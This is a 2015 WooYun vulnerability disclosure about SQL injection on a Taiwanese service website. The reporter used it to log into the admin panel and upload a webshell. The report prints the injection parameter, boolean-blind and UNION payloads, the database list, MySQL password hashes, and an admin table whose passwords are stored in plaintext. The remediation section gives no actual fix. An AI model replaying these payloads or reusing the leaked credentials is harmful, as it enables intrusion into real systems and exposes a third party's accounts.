当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143986

漏洞标题:某台湾服务网SQL注入漏洞getshell(臺灣地區)

相关厂商:Hitcon台湾互联网漏洞报告平台

漏洞作者: 路人甲

提交时间:2015-10-07 08:53

修复时间:2015-11-21 12:50

公开时间:2015-11-21 12:50

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-07: 细节已通知厂商并且等待厂商处理中
2015-10-07: 厂商已经确认,细节仅向厂商公开
2015-10-17: 细节向核心白帽子及相关领域专家公开
2015-10-27: 细节向普通白帽子公开
2015-11-06: 细节向实习白帽子公开
2015-11-21: 细节向公众公开

简要描述:

SQL注入漏洞,后台弱密码。

详细说明:

SQL注入漏洞,后台弱密码,后台上传没有做文件类型限制。

漏洞证明:

注入点:
http://**.**.**.**/all-module01s.php?id=13427&t_type=s
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=13427 AND 9021=9021&t_type=s
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: id=-8776 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7162717671,0
x52416947754d4449794a,0x7178717071),NULL,NULL,NULL,NULL,NULL-- &t_type=s
---
available databases [8]:
[*] iitw
[*] iitw_
[*] information_schema
[*] investtaipei
[*] investtaipei100-103
[*] mysql
[*] phpmyadmin
[*] test
数据库root用户空密码
database management system users password hashes:
[*] EIP [1]:
password hash: 220ab8b65cd86173
[*] km [1]:
password hash: 7b67977111f1e8a5
[*] root [2]:
password hash: 3ff5dc474fc39cbf
password hash: NULL
Database: iitw
[21 tables]
+----------------+
| auth_ |
| counter |
| epaper_user |
| module01 |
| module01_class |
| module01_copy |
| module01_home |
| module02 |
| module02_class |
| module02_files |
| module03 |
| module03_class |
| module04 |
| module05 |
| module06 |
| module07 |
| module07_class |
| module07_files |
| question |
| question1 |
| viewer |
+----------------+
Database: iitw
Table: auth_
[7 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| position | varchar(20) |
| acc_mgr | tinyint(1) |
| id | varchar(16) |
| passwd | varchar(32) |
| TheDate | datetime |
| TheUser | varchar(30) |
| truename | varchar(16) |
+----------+-------------+
Database: iitw
Table: auth_
[2 entries]
+-------+----------+---------+---------+---------------------+----------+-------
-----+
| id | passwd | acc_mgr | TheUser | TheDate | truename | positi
on |
+-------+----------+---------+---------+---------------------+----------+-------
-----+
| admin | 27058317 | 1 | admin | 2010-05-05 15:12:53 | admin | adm
|
| iitw | iitw8888 | 0 | admin | 2010-04-19 09:56:00 | 大陸事務組 | <
blank> |
+-------+----------+---------+---------+---------------------+----------+-------
-----+
密码明文存储。
轻松登陆后台,上传网马。

捕获.PNG


捕获2.PNG


修复方案:

你懂。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-10-07 12:48

厂商回复:

感謝通報

最新状态:

暂无